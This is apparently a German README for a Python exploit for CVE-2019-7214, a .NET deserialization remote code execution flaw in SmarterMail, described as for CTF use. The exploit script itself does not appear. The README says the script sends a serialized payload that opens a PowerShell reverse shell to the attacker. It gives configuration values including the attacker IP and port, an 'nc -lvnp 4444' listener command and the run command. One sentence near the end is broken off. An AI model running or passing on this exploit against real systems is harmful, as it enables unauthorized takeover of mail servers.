
Nur für CTF-Zwecke (die CVE-2019-7214 löst den Host ebenfalls aus /etc/hosts auf).
Dieses Python-Skript greift einen verwundbaren Dienst an, der auf einem entfernten Windows-Computer läuft. Es sendet eine serialisierte .NET-Nutzlast, die eine PowerShell-basierte Reverse-Shell zurück zum Computer des Angreifers startet.
Remote Code Execution bei der .NET-Deserialisierung für das SmarterMail-System.
Aktualisiere den Konfigurationsabschnitt des Skripts, damit er zu deiner Umgebung passt:
HOSTNAME = 'hostname' # Target hostname (resolved via /etc/hosts)
PORT = 9999 # Target port listening for serialized input
LHOST = '192.168.45.185' # Attacker IP (listener)
LPORT = 4444 # Attacker listening port
nc -lvnp 4444
python3 CVE-2019-7214 .py
Bei Erfolg erhältst du auf deinem Listener eine PowerShell-Eingabeaufforderung vom Ziel.
System.Management.Automation-Funktionalität ausführen kann.Dieses Skript dient ausschließlich zu Bildungszwecken. Die unbefugte Verwendung gegen Systeme, die du nicht besitzt oder für die du keine ausdrückliche Testgenehmigung hast, ist illegal und unethisch.